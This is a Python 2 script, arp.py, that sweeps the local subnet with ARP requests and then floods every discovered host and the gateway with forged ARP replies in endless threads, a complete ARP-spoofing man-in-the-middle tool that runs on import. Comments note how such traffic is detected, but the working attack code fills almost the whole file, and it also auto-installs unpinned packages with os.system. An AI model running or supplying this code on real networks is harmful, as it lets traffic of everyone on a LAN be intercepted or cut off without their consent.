arp.py
# encoding: utf-8
# -*- coding: utf8 -*-
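import os
import sys
import threading
import time

# NOTE(security): the fallbacks below install whatever version the package
# index currently serves, unpinned and unverified, with this process's
# privileges. Prefer declaring pinned dependencies (for example a
# requirements file with hashes) and installing them before running the
# script.
try:
    import netifaces
except ImportError:
    command_to_execute = "pip install netifaces || easy_install netifaces"
    # os.system() reports a failed command through its return status and does
    # not raise OSError, so the status is what has to be checked here.
    if os.system(command_to_execute) != 0:
        print("Can NOT install netifaces, Aborted!")
        sys.exit(1)
    import netifaces

try:
    from scapy.all import srp, Ether, ARP, conf,sendp,fuzz,send
except ImportError:
    command_to_execute = "pip install scapy"
    # Same status check as above: a failed install now reaches the abort
    # message instead of surfacing as a second ImportError traceback.
    if os.system(command_to_execute) != 0:
        print("Can NOT install scapy, Aborted!")
        sys.exit(1)
    from scapy.all import srp, Ether, ARP, conf,sendp,fuzz,send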
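def get_network_infor():
    """Read the default IPv4 route and the addressing of the interface behind it.

    Returns:
        A 4-tuple of strings: (gateway IP, local IP, local MAC, netmask).

    Raises:
        RuntimeError: if the routing interface is not listed by netifaces or
            has no IPv4 address/netmask entry. Previously the missing entry
            was swallowed and the function failed later on an unbound local.
        KeyError: if the interface has no link-layer (AF_LINK) entry, as before.
    """
    print("******************* start to get basic local network information ********************* ")
    print("")
    # Query the routing table once; index 0 is the gateway IP and index 1 the
    # name of the interface that routes to it.
    default_route = netifaces.gateways()['default'][netifaces.AF_INET]
    gatewayIP = default_route[0]
    routingNicName = default_route[1]

    if routingNicName not in netifaces.interfaces():
        raise RuntimeError("routing interface not found: " + str(routingNicName))

    addresses = netifaces.ifaddresses(routingNicName)
    # Local MAC address of the routing interface.
    localMacAddr = addresses[netifaces.AF_LINK][0]['addr']
    try:
        # Local IPv4 address.
        localIPAddr = addresses[netifaces.AF_INET][0]['addr']
        # TODO(Guodong Ding) Note: On Windows, netmask maybe give a wrong result in 'netifaces' module.
        # Subnet mask.
        IPNetmask = addresses[netifaces.AF_INET][0]['netmask']
    except KeyError:
        raise RuntimeError("no IPv4 address or netmask on interface: " + str(routingNicName))

    print("[*]get gatewayIP: " + gatewayIP)
    print("[*]get localIP : " + localIPAddr)
    print("[*]get localMac : " + localMacAddr)
    print("[*]get IPNetmask: " + IPNetmask)
    print("")
    print("******************* finish to get basic local network information ********************* ")
    # Gateway IP, local IP, local MAC, subnet mask.
    return str(gatewayIP),str(localIPAddr),str(localMacAddr),str(IPNetmask)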
def get_netmask_len(netmask):
    """Return the count of leading 1 bits in a dotted-decimal netmask string.

    Each octet is rendered with bin() without zero padding and the pieces are
    concatenated; the length of the run of characters before the first '0' is
    returned. For a contiguous mask that is the prefix length.
    """
    bits = "".join(bin(int(octet))[2:] for octet in netmask.split('.'))
    # Everything before the first '0' is the leading run of ones.
    leading_ones = bits.partition('0')[0]
    return len(leading_ones)
def create_lan(localIP,netmask_lan):
    """Join an IP address and a prefix length into "<ip>/<length>" and print it.

    Returns the joined string.
    """
    cidr_text = '/'.join((str(localIP), str(netmask_lan)))
    print("[*]lan has creted: " + cidr_text)
    return cidr_text
def get_ip_mac(lan):
    """Send broadcast ARP requests for *lan* and record every host that answers.

    Args:
        lan: value handed to scapy's ARP(pdst=...); the caller on this page
            builds it with create_lan() as "<ip>/<prefix length>".

    Each answer's Ethernet source MAC and ARP sender IP are printed and
    appended to the module-level macTable / ipTable lists at matching indexes.
    Returns None.
    """
    print "******************* start to get IP-MAC ********************* "
    print
    # Requests go to the Ethernet broadcast address; timeout=2 is passed to srp().
    # Unanswered probes (unans) are collected but never used.
    # NOTE(detection): a sweep of who-has requests from one source across a
    # whole subnet is the pattern ARP-scan detection rules usually key on.
    ans, unans = srp(Ether(dst="FF:FF:FF:FF:FF:FF")/ARP(pdst=lan), timeout=2)
    for snd, rcv in ans:
        cur_mac = rcv.sprintf("%Ether.src%")
        cur_ip = rcv.sprintf("%ARP.psrc%")
        print cur_mac + ' - ' +cur_ip
        # The two lists are kept index-aligned; get_gateway_mac() relies on that.
        ipTable.append(cur_ip)
        macTable.append(cur_mac)
    print
    print "******************* finish to get IP-MAC ********************* "
def get_gateway_mac(gate_ip):
    """Look up *gate_ip* in the module-level tables and take its entry out.

    The first matching IP and the MAC stored at the same index are removed
    from ipTable and macTable. Returns that MAC as a string, or an empty
    string when the IP is not present (the tables are then left unchanged).
    """
    if gate_ip not in ipTable:
        return str('')
    position = ipTable.index(gate_ip)
    # Drop the entry from both tables so they stay index-aligned.
    found_mac = macTable.pop(position)
    ipTable.pop(position)
    return str(found_mac)
def create_arp_reply_packet(src_mac,des_mac,fake_src_ip,des_ip):
    """Build an Ethernet/ARP reply frame that binds *fake_src_ip* to *src_mac*.

    Args:
        src_mac: MAC used as both the Ethernet source and the ARP sender hardware address.
        des_mac: MAC used as both the Ethernet destination and the ARP target hardware address.
        fake_src_ip: IP placed in the ARP sender protocol address field.
        des_ip: IP placed in the ARP target protocol address field.

    Returns:
        The stacked scapy packet (Ether / ARP); nothing is sent here.
    """
    eth = Ether(src=src_mac, dst=des_mac)
    # op=2 is the ARP "reply" (is-at) opcode.
    # NOTE(detection): the sender IP/MAC pair in this frame is not the real
    # owner's pair; switch features such as Dynamic ARP Inspection compare that
    # pair against a trusted binding table and drop mismatches.
    arp = ARP(hwsrc=src_mac, psrc=fake_src_ip, hwdst=des_mac, pdst=des_ip, op=2)
    pkt = eth / arp
    return pkt
def send_to_target(gateway_mac,host_mac,local_mac,gateway_ip,host_ip,local_ip):
    """Repeatedly send two forged ARP replies, one to a host and one to the gateway.

    The frame for the host carries the gateway's IP with the local MAC; the
    frame for the gateway carries the host's IP with the local MAC. Both are
    built once and re-sent forever, with a 0.5 s sleep after each send.

    Args:
        gateway_mac, gateway_ip: the gateway's addresses.
        host_mac, host_ip: the addresses of the host this thread handles.
        local_mac: MAC placed in both forged replies.
        local_ip: accepted but not used in this function.

    Never returns: the loop has no exit condition.
    """
    print "********* "+ str(host_ip) +" thread start ***********"
    packet_to_host=create_arp_reply_packet(local_mac,host_mac,gateway_ip,host_ip)
    packet_to_gateway=create_arp_reply_packet(local_mac,gateway_mac,host_ip,gateway_ip)
    # NOTE(detection): this produces a steady stream of unsolicited ARP replies
    # (about one per second to each side) and makes two IPs resolve to the same
    # MAC; ARP-monitoring tools typically report this as an IP-to-MAC change or
    # as a duplicate MAC.
    # NOTE(review): nothing on this page re-announces the original mappings, so
    # affected hosts keep the forged entry until it is refreshed or expires.
    while 1:
        sendp(packet_to_host)
        time.sleep(0.5)
        sendp(packet_to_gateway)
        time.sleep(0.5)
def arp_target_helper(gatewayMAC,gatewayIP,localMAC,localIP):
    """Start one send_to_target() thread for every entry left in ipTable / macTable.

    Args:
        gatewayMAC, gatewayIP: the gateway's addresses, passed through to each thread.
        localMAC, localIP: the local addresses, passed through to each thread.

    Returns None right after starting the threads; it does not join them.
    """
    # No daemon flag is set and each worker loops forever, so the process keeps
    # running after the main script finishes.
    # NOTE(review): thread count equals the number of discovered hosts; there is no cap.
    for i in range(len(ipTable)):
        thread = threading.Thread(target=send_to_target, args=(gatewayMAC,macTable[i],localMAC,gatewayIP,ipTable[i],localIP))
        thread.start()
# The program starts here.
# NOTE(review): everything below runs at import time; there is no
# `if __name__ == "__main__":` guard.
# Table of discovered IP addresses.
ipTable=[]
# Table of discovered MAC addresses, index-aligned with ipTable.
macTable=[]
# Gateway IP, local IP, local MAC, subnet mask.
gatewayIP ,localIP ,localMac ,IPNetmask = get_network_infor()
# LAN range string; built from the gateway IP and the netmask's prefix length.
lan=create_lan(gatewayIP,get_netmask_len(IPNetmask))
# Collect IP-MAC pairs of the hosts that answer.
get_ip_mac(lan)
# Get the gateway's MAC and remove the gateway's entry from the tables.
# NOTE(review): get_gateway_mac() returns '' when the gateway did not answer;
# that case is not checked before the next step.
gatewayMAC=get_gateway_mac(gatewayIP)
# Start the sender threads.
arp_target_helper(gatewayMAC,gatewayIP,localMac,localIP)